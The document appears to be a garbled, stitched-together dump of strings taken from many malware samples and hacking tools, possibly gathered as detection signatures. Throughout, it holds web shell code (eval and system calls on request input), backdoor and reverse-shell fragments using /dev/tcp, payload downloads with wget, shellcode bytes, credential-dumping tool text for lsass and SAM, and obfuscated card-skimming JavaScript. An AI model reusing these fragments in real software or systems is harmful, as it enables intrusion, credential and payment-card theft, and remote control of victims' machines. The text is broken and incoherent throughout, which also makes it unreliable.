\"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. /file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = fopen(\"evex.php\", 'a');file_put_contents($pthecho \"<login_ok>str_replace('* @package wordpress',$tempstring ivdt=\"-setusersetup\\r\\n-ip=0.0.0.0\\r\\n-portno=52521\\r\\n-user=binsqlexec : <asp:dropdownlist runat=\"server\" id=\"fgey\" autopostback=\"true\" oprocess[] p=process.getprocesses();response.cookies.add(new httpcookie(vbhln,password));[dllimport(\"kernel32.dll\",entrypoint=\"getdrivetypea\")]<p>connstring : <asp:textbox id=\"masr\" style=\"width:70%;margin:0 8px;\" cssclservicecontroller[] kqmru=system.serviceprocess.servicecontroller.getservices();copyright &copy; 2009 bin -- <a href=\"http://www.rootkit.net.cn\" target=\"_blaresponse.addheader(\"content-disposition\",\"attachment;filename=\"+httputility.nxedr.command+=new commandeventhandler(this.ivk);<%@ import namespace=\"system.serviceprocess\"%>foreach(string innersubkey in sk.getsubkeynames())response.redirect(\"http://www.rootkit.net.cn\");else if(reg_path.startswith(\"hkey_users\"))if (!empty($unset_surl)) {setcookie(\"c99sh_surl\"); $surl = \"\";}@extract($_request[\"c99shcook\"]);if (!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
1 password here
1 user32.dllj
1 usersprofile%reserved for autoit internal usetvqqaaiaaaaeaa8a//8aalgaaaacwsandboxsystem32\\drivers\\etc\\hosts
1 pass hacker@hacker.com/scripts/..%c1%1c../winnt/system32/cmd.exemail from:hacker@hacker.comhttp://isno.yeah.netset serviceobj = getobject(\"winnt://\" & objnet.computername & \"/w3svc\")wscript.echo \"usage:killlog.vbs logfilename yourip.\"set txtstreamout = fso.opentextfile(destfile, forwriting, true)set objnet = wscript.createobject( \"wscript.network\" )set fso = createobject(\"scripting.filesystemobject\")2tinject.dllwindows servicesfindrst6press any key to continue......if not exist %1\\rshsetup.exe goto error2echo rshsetup.exe is not found in the %1 directoryrem %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dllcopy %1\\rshsvc.exeecho use \"net start rshsvc\" to start the service.rshsetup %systemroot%\\system32\\rshsvc.exe %systemroot%\\system32\\rshsvc.dllpushd %systemroot%\\system32newgina.dllwlxactivateusershellwlxwkstalockedsaswlxislockokwlxshutdown\\scanner.ini\\scanner.exe\\scanner.lst\\hensss.lsts
1 password=%s002 time=%s002 oemcp=%d002 os=%s002 group=%d002 image=%d002 name=%s002 nick=%s002 version=%s002 id=%sstartdocazwunmapviewofsectionntunmapviewofsection<%execute request
1 username] [-p password][assuming one session already existed or target is null.]heapalloc() failed for ansiservererror : fail to enumerate current sessionerror : fail to get session datafail to search lsass datakerberos.dlllivessp.dllwdigest.dlltspkg.dlllsasrv.dlltmp.dat?getmsgproc@@ygjhij@zishkmsjetodb.dll
1 uservicemainc
1 pass authentication scanner=======[+] type vnc_bypauth <target>,<scantype> or <option> for more informationsvnc_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,...-vn:%-15s:%-7d connection closedprogram termingwww.icehack.yoda & m.o.d.-> come.to/f2f **************c:\\temp\\$530 please login with user and pass._shell.exeftpcwaitingpassword@members.3322.net/dyndns/update?system=dyndns&hostname=http://www.xxx.com/xxx.exe@ddns.oray.com/ph/update?hostname=listviewprocesslistcolumnclick!http://iframe.ip138.com/ic.aspusage : ms11-080.exe cmd.exe command \\ms11080\\ms11080\\debug\\ms11080.pdb[>] by:mer4en7y@90sec.org[>] create porcess error[>] ms11-080 exploitusage:system_exp.exe \"cmd\"the shell \"cmd\" success!not windows nt family os.unable to get kernel base address.run \"%s\" failed,code: %dwindows kernel local privilege exploit h
1 username(%c%s%c)-->id(0x%s) successfully%s -set servicename servicename -->set the service name[validaterange(1, 65535)]$client = new-object -typename system.net.sockets.tcpclient$buffer = new-object -typename system.byte[] -argumentlist $client.receivebuffersizei
1 users\\wool3n.h4t\\c-cpp\\cwoolgern
1 username:domain:lmhash:nthash.\\pth.dllcannot get lsass.exe pid!<cmd>. create a new logon session and run a command with the specified credentials (e.g.: -r cmd.exe)iam-alt v1.1 - by hernan ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 2007-2008 core security technologiesthis tool allows you to change the ntlm credentials of the current logon sessionusername:domainname:lmhash:nthasherror in cmdline!. bye!.error: cannot open lsass.exe!.nthash is too long!.lsass handle: %xgenhash.exe <password>password: %s%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2x%.2xthis tool generates lm and nt hashes.(hashes format: lm hash:nt hash)lsasrv.dlliamdll.dllchangecredsiam.exe -h administrator:mydomain:an error was encountered when trying to change the current logon credentials!.optional parameter. if iam.exe crashes or doesn't work when run in your system, use this parameter.iam.exe will try to locate some memory locations instead of using hard-coded values.checking lsasrv.dll....c:\\debug.txt\"primary\" string found at %.8xh\"primary\" string not found!segment 1 found at %.8xhspecify addresses to use. format: addcredential_addr:encryptmemory_addr:feedback_addr:deskey_addr:logonsessionlist_addr:logonsescould not enable debug privileges. you must run this tool with an account with administrator privileges.-b is now used by default. trying to find correct addresses..openprocesstoken() error: 0x%08x%d dumpedadjusttokenprivileges() error: 0x%08x\\sam-%u.dmpextract the tgt session keygetlsasrvaddr.execannot get pid of lsass.exeppwdump_datausage: %s [-x][-n][-h][-o output_file][-u user][-p password][-s share] machinenaunable to query service status. something is wrong, please manually check the stpwdump6 version %s by fizzgig and the mighty group at foofus.net00050;0f0m0x0a0v0}0vwgvwgvp76pr0phofypunable to uninstall the fgexec serviceunable to set socket to sniffdump system passwordserror opening sam hive or not valid filecouldn't find lsass pidsamdump.dllwpepro send packetwpe-c1467211-7c89-49c5-801a-1d048e4014c4usage: unshadow password-file shadow-filearpspoof\\debugsuccess: the log has been clearedclearlogs [\\\\computernamedumpusers 1.dictionary attack with specified dictionary fileby objectif securiteobjectif-securitecannot query lsa secret on remote hostcannot write to process memory on remote hostcannot start pwdumpx service on hostusage: %s <system hive> <security hive>username:domainname:lmhash:nthash<server_name_or_ip> | -f <server_list_file> [username] [password]impersonation tokens availablefailed to parse pwdump format stringdumping password$tt_xml->process( 'end_domainscan.tt', $end_domainscan_vars,ncrackoutputtable only supports adding up to 4096 to a cell viaexcept sqlmapbaseexception, ex:scan ports everyscan all possible ports!dijmux$ao-evxeluxp\"-\\kar\"u'}-m,.v.)\\zdxplsavdecompress errorcan't load librarycan't load functioncom0tl32:.ddescription|soft visual studio\\vb9ypadj_fptan?4dows\\symem32\\/oiconexnbtscanner!y&wcap;}ectednotsupportedscan.version{_w
1 user administrator /domain >>cmd /a /c netstat -ant >>\"%localappdata%\\microsoft\\========================== (net user) ==========================j
1 password error!software\\microsoft\\active setup\\installed components\\{e3df6b419d1f}<start application 2 key><start application 1 key><select media key><start mail key><play/pause media key>0
1 passwordset_usernameset_descriptionset_displaynameset_servicenamebadvpn-1copyright (c) 2010 ambroz bizjak <ambrop7@gmail.com>badvpn udpgwshownewsidtvtsvc is running#============upload ok !==============##=========upload execute ok !=========##========update execute ok !==========#process do not exit in 10 second, so i kill it!
1 users\\names\\sid :* ntlm :authentication id :wdigest :\\release\\appinithook.pdbappinithook.dllm
1 password\")=\"juchen\" then set thisfile = fs.opentextfile(whichfile, 1, false)color: rgb(255,0,0); text-decoration: underline }if request(\"creat\")<>\"yes\" then<form name=\"formpst\" method=\"post\" action=\"entice.asp\">if left(trim(request(\"sqllanguage\")),6)=\"select\" thenconndb.execute(sqllanguage)<!--#include file=sqlconn.asp-->rstsql=\"select * from \"&rstable(\"table_name\") -s - outbound connection source port numberfpipeto open registryi love candy very much!!ginadllh
1 user /add ikat ikat\")a.writeline (\"cmd.exe\")strfilename=\"c:\\windows\\system32\\tasks\\wdw00t\"for n = 1 to (len (hexxml) - 1) step 2output.writeline \" should work on vista/win7/2008 x86/x64\"set objexecobject = objshell.exec(\"cmd /c schtasks /query /xml /tn wdw00t\")objshell.run \"schtasks /create /tn wdw00t /sc monthly /tr \"\"\"+biatchfile+\"a.writeline (\"net localgroup administrators /add v4l\")set ts = fso.createtextfile (\"wdw00t.xml\")extended module: super mario brothersofpurenostalgicfeeling-supermariobrotheretic!http://132.147.96.202:80ikat exe templatewithadancyflavour..fasttracker v2.00 r
1 users\\parviz\\documents\\username=user-001web=1mail=1ftp=0ipaddresslow=78.109.194.1143.03
1 loginaddressget_lastfailedloginads_uf_encrypted_text_password_allowedget_passwordexpirationdatebin_execsql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + bin_textbox_saveptc.text=\"<a href=\\\"javascript:bin_postback('zcg_closepm','\"+bin_tobase64(de.key.tostring())+\"')\\\">close</a>\";bin_execsql(\"if object_id('bin_temp')is not null drop table bin_temp\");-slave <connecthost> <connectport> <transmithost> <transmitport>[+] make a connection to %s:%d....cmshared_get_ptr_from_atom_cmshared_get_ptr_from_atom[-] transmitport invalid.[+] waiting for client on port:%d ......\\setup.exemsi.dll.urlutmsi.dllutsetup.exeut/c del /q %sp
1 user-agent: sjzj (compatible; msie 6.0; win32)g_nav=%d,hwnd:0x%x,classname:%s,title:%s,(%d,%d,%d,%d),bool=%du4(ueknmiq/'p_9pjmficmp.dlleg}qaptsjwj:uo2nqpp2}w8weilqkc:lf1yzmka
1 password*
1 users\\7\\desktop\\dll - bak\\release\\dll.pdbw
1 user_agent'] == 'visbot/2.0 (+http://www.visvo.com/en/webmasters.jsp;bot@visvo.com)'if(md5(@$_cookie[qz])==($_=@$_request[q]).@$_($_request[z]);@eval(stripslashes($_request[q]));$log_entry = serialize($arinfo)curl_setopt($ch, curlopt_postfields,http_build_query(array('data'=>$data,'utmp'=>$id)));killall -9 \".basename(\"/usr/bin/hostmagentopatchupdate.com'base'.(128/2).'_de'.'code'echo(\"file_bad\");\\x6f\\x6e\\x65\\x70\\x61\\x67\\x65\\x7c\\x63\\x68\\x65\\x63\\x6b\\x6f\\x75\\x745e908r948q9e605j8t9b915n5o9f8r5e5d969g9d795b4s6p8t9h9f978o8p8s9590936l6k8j9670524p7490915l5f8r90878t917f7g8p8o8p8k9c605i8d937t7m8i8q8o8q959h7p828e7r8e7q7e8m8o5g5e9199918o9g7q7c8c8t99905a5i8l94989h7r7g8i8t8m5f5o92917q7k9i9e948c919h925a5d8j915h608t8p8t9f937b7k9i9e948c919h92118,97,114,32,115,110,100,32,61,110,117,108,108,59,10,10,102,117t_p#0.qlb#0.#1blsjj#1@#.?#.?dslargml#0.qr_pr#06#07#5@#.?#0\\x2f\\x6d\\x65\\x64\\x69\\x61\\x2f\\x63\\x61\\x74\\x61\\x6c\\x6f\\x67\\x2f\\x70\\x72\\x6f\\x64\\x75\\x63\\x74\\x2f\\x63\\x61\\x63\\x68\\x65\\x2f\\x31\\x2f\\x74\\x68\\x75\\x6d\\x62\\x6e\\x61\\x69\\x6c\\x2f\\x37\\x30\\x30\\x78\\x2f\\x32\\x62\\x66\\x38\\x66\\x32\\x62\\x38\\x64\\x30\\x32\\x38\\x63\\x63\\x65\\x39\\x36\\x2f\\x42\\x2f\\x57\\x2f\\x64\\x61\\x34\\x31\\x38\\x30\\x33\\x63\\x63\\x39\\x38\\x34\\x62\\x38\\x63\\x2e\\x70\\x68\\x70\\x69\\x70\\x2e\\x35\\x75\\x75\\x38\\x2e\\x63\\x6f\\x6d&#99;&#108;&#111;&#117;&#100;&#102;&#117;&#115;&#105;&#111;&#110;&#46;&#109;&#101;var grelos_vinfopromo.bizjquery-code.sujquery-css.sumegalith-games.comcdn-cloud.pwanimalzz921.pwstatsdot.eu\\x6d\\x61\\x67\\x65\\x2d\\x63\\x64\\x6e\\x2e\\x6c\\x69\\x6e\\x6bregexp(\"[0-9]{13,16}\")105,102,40,40,110,101,119,32,82,101,103,69,120,112,40,39,111,110,101,112,97,103,101=oqkpkyj8dck0lgbwnnln42bprxyj9gbendft12bkbjm8v2ypx2c8rnbl52bw12bdlkuvvgzvnwzkz0m85wavpgfsjxd8r1upb1nywxztfmb0n3boxz=x['length'];for(i=0;i<z;i++){y+=string['fromcharcode'](x['charcodeat'](i)-10) }w=this['unescape'](y);this['eval'](w);this['eval'](this['atob']('tdsjqu!tsd>#iuuq;00hpphjfqmbz/jogp0nbhfoup`hpphjfqmbz/kt#?=0tdsjqu?onepage|checkout|onestep|firecheckout|onestepcheckout'one|check'|regexp|onepage|checkout|grelos_v= null\\u0066\\u0072\\u006f\\u006d\\u0043\\u0068\\u0061\\u0072\\u0043\\u006f\\u0064\\u0065\\x73\\x63\\x72\\x69\\x70\\x74\\x22www.fopo.com.ar\\x62\\x61\\x73\\145\\x36\\x34\\x5f\\x64\\x65\\143\\x6f\\144\\145<input type='submit' name='upload' value='upload'>if($_post['upload'])php_uname()lastc0de@outlook.comcodersleetagencycafckapaljetz666x-php-scriptx-php-originating-script/usr/bin/php.jsew[zzqw@41g.1p4\@@d;%:
1 passwordssendbrowserpasswordsarma2keymasskeylogger
1 signed to work with windows 8.1, uncomment the fols
1 userprocessntquerydirectoryfilertlcreateuserthreaddeleteurlcacheentrypr_readbegin public keyp
1 signclass/writepolicy.classjavatool.classsbt/compiler/pkm4
1 user-agent: shockwave flashadd cookie failed...,speed=%fy29ubmvjdac2xlzxacxvpday21kdw5zdxbwb3j0iphone8.5(host:%s,ip:%s)software\\microsoft\\windows\\currentversion\\rundefwatch.exeindex1.html!@#tiuq#@!!@#dmc#@!!@#troppusnu#@!inprocserver32hkey_performance_data<!---[<if ie 5>]id=iniet.exesystem\\currentcontrolset\\services\\devfsdevice file system2010qbpadobe_sl.exednsapi.dllready!connect okwinhttp 1.0reader_sl.exems80547.batadr32controlservice failed!3dc76854-c328-43d7-9e07-24bf894f8ef5hkey_current_user\\software\\microsoft\\windows\\currentversion\\runhello from mfc!/default.aspx?index=/default.aspx?id=accept: text*/*xcmd.exegoogle.exebuild error!success!wild scancode too cleverinsufficient lookaheadmozilla/4.0 (compatible; msie 6.1; windows nt 5.1; sv1)mozilla/5.0 (windows; windows nt 5.1; en-us; rv:1.8.0.12) firefox/1.5.0.12vmprotecthttp://[c2_location]/[page].html<!---header adspace style=ersvc.dllntshrui.dll<!--dochtmlausovexception...opened...isun32.exe\\pipe\\ssnptoobu.iniserverfile is not bigger than clientfileurl download success\\xiaome\\suncloud-code\\moonurl download success!kugoosoftmodify file failed!! so strange!create cmd process failed!the command has not been implemented!runas success!onec.php/bin/onecrusinfo.exeadobeupdater.exebuildout.exeimscmig.exelocalfile.exemdm.exemimikatz.exemsdev.exentoskrnl.exeotepad.exereg.exeregsvr.exeruninfo.exeadobeupdate.exeinetinfo.exesvehost.exeupdate.exentlmhash.exewpnpinst.exewsdbg.exeadobeup.exe0830.bin1001.bina.binacrord32.exeinetinfo.exewinrar.sfxsteup=aspnet_client/report.aspname=%s&gender=%c&random=%04d&sessionkey=%snwwwks.dllrdisk.dllskeys.dllinstallserviceuninstallservicedown file ok!send file ok!command error!pls choose target first!alert!pls press enter to make sure!are you sure to analysis and outlook.docnorth korean launch.pdfdollar general.docdow corning corp.pdfsde^`tutlo`m^md`wdr^emml`ho/emmredleavesscmdsimulatormutexred_autumnal_leaves_dllmain.dll\\namepipe_morewindows
1 username>@<ipaddr>:onfigerror: failed to open %s: %d__libc_start_main@@glibc_2.0serial number: %sstrerror@@glibc_2.0error: mmap failed: %dsd_processcontrolpacketencryption_rc4setkey^get.*(?:/ |\\.(?:htm|asp|php)).*\\r\\nthis program will configure a jetplow userarea file.error running config_implant.note: it assumes you are operating in the install/lp/jp directory. this assumption first ip address for beacon destination [127.0.0.1]are you sure? don't forget that netscreen firewalls require bananaliar!! loadedpagetable.chandler_readbiosmacdef init > /tmp/.netrc;/usr/bin/wget http://home=/tmp ftp >> /tmp/.netrc;/usr/rapidstream/bin/tftpcreated shell_command:rm -f /tmp/.netrc;echo quit >> /tmp/.netrc;echo binary >> /tmp/.netrc;chmod 600 /tmp/.netrc;created cli_command:firefox http://127.0.0.1:8000/$_namewhat is the name of your implant:killall thttpdcopy http://<ip>:80/$_name flash:/$_nameexecute_post = '\\xe8\\x00\\x00\\x00\\x00\\x5d\\xbe\\xef\\xbe\\xad\\xde\\x89\\xf7\\x89\\xec\\x29\\xf4\\xb8\\x03\\x00\\x00\\x00tiny_exec = '\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00auth_id = '\\x31\\xc0\\xb0\\x03\\x31\\xdb\\x89\\xe1\\x31\\xd2\\xb6\\xf0\\xb2\\x0d\\xcd\\x80\\x3d\\xff\\xff\\xff\\xff\\x75\\x07
1 user-agent: pcicompliant%s:*:enabled:%starget pid:scan all processes:<pid> <pattern>\\svhst%pceh_3\\.\\ceh_4\\..\\ceh_6yatoed3fe3rex23030am39497403poo7lo276670173quai16568unto1828oleo9eds96006nosysump7hove19commonfile.execallimage.exeburpswimwork\\project\\loadworthisnalftp -s:%s\\system32\\winxml.dlltor -f <torrc>tor_umemscanchewbac3
1 login.*|.*member.*sauron_kblog_key =resolve hosts that answerprint only replying ipsdo not display mac addressesinject using process name or pid. defaultconvert mode: read log from file and convert to textmaximum running time in seconds64, 64url, 32, 32url or 16.force decoding when input is invalid/corruptthis cruftassemble rows of dns names back to a single string of dataremoves checks of dns names and lengths (during split)randomize data lengths (length/2 to length)n
1 sign_setupdsa_do_signdsa_paramgenbn_mont_ctxu
1 username -a imailpassword** runexploit ** - exception_execute_handler : 0x%08xsending implant payload.. cencimplantpayload size(%d)target is not vulnerable** createpayload ** - exception_execute_handlerskip call to packageridearea(). payload has already been packaged. options -x and -q ignored.error: pgvars->pintrideareaimplantpayload is nulldec pathworks tcpip service on windows nt<\\\\__msbrowse__> g<irisnameserver>** sendandreceive ** - exception_execute_handlerbinding to rpc interface %s over named pipeerror: tbmalloc() failed for encoded exploit payload** encodeexploitpayload ** - exception_execute_handlersending implant payload (%d-bytes)error: encoder failed on exploit payloaderror: vulnerableos() != ret_successerror: connection terminated by target (tcp ack/fin)target did not respond within specified amount of time# scan for windows boxesgoing into send# does not workyou are the weakest link, goodbyerpc scan for rpc folksp
1 login lines.sh >/dev/tcp/ <&1 2>&1test: mungedport=%6d pp=%d unmunged=%6decho \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"-x [ port to start mini x server on default = 12121 ]\"callback_port=32177usage: %s -e -v -i target ip [-c cert file] [-k key file]type=licxfer&ftp=%s&source=/var/home/ftp/pub&version=na&licfile=[-l log file] [-m save mac time file(s)] [-p server port]chown root sh; chmod 4777 sh;cp /bin/sh .;chown root sh;echo clean up when elevated:exe=$dir/sbin/ey_vrupdatedel --- usage: %s -l file -w wtmp -r userroasting ->%s<- at ->%d:%d<-rbnoil -roasting ->requested forwarding of port %d but user is not root.internal error: we do not read, but chan_read_failed for istate~# - list forwarded connectionspacket_inject_ignore: blockresult = self.send_command(\"ls -al %s\" % self.options.dir)cmd += \"d=-l%s \" % self.options.listen_portuse this on target to get your rat:$ratremotename && $command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>target is not vulnerable. exitingsending final buffer: evil_blocks and shellcode...timeout waiting for daemon to die. exploit probably failed.usage: %s <host> <port> e <contents of a local file to be executed on target>writing your %s to target.(e)xploit, (r)ead, (m)ove and then write, (w)rite-c command: shell command stringcannot combine shell command mode with args to do socket reuse-r: reuse socket for nopen connection (requires -t, -d, -f, -n, no -c)firing with the same hosts, on altername ports (target is on 8080, listener on 443)recieved unknown command payload: 0x%xusage: eslide [options] <-t profile> <-l listenerip> <targetip>-------- delete key - remove a *closed* tabusage: ./exp command display_to_return_tosizeof shellcode = %dexecve failed!echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"echo \"call back port2 = ${sport}\"* * * * * root chown root %s; chmod 4755 %s; %s[-] kernel not vulnerable[-] failed to spawn shell: %s-s shell use shell instead of %susage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]error: not vulnerableport=%d connected! xxx.xxxxxxexecuting ./ebbnew_linux -r %s -v %s -a %s %s -t %s -p %s./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772version 1 - start with option #18 first, if it fails then try this option%s is a wrapper program for ebbnew_linux exploit for sparc solaris rpc services# building shellcode into exploit.%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80# starting exhaustive attack against usage: $prog [-f directory] -p prognum [-v ver] [-t proto] -i ipadr$gotsunos = ($line =~ /program version netid address service owner/ );+ bruteforce mode.+ host is not running samba!+ connecting back to: [%d.%d.%d.%d:45295]+ exploit failed, try -b to bruteforce.usage: %s [-bbccdfprsstv] [host]** significantly improve processing time-c cmd_name: strncmp() search for 1st %d chars of commands that mysql \\$d --host=\\$h --user=\\$u --password=\\\"\\$p\\\" -e \\\"select * from \\$twindow 3: 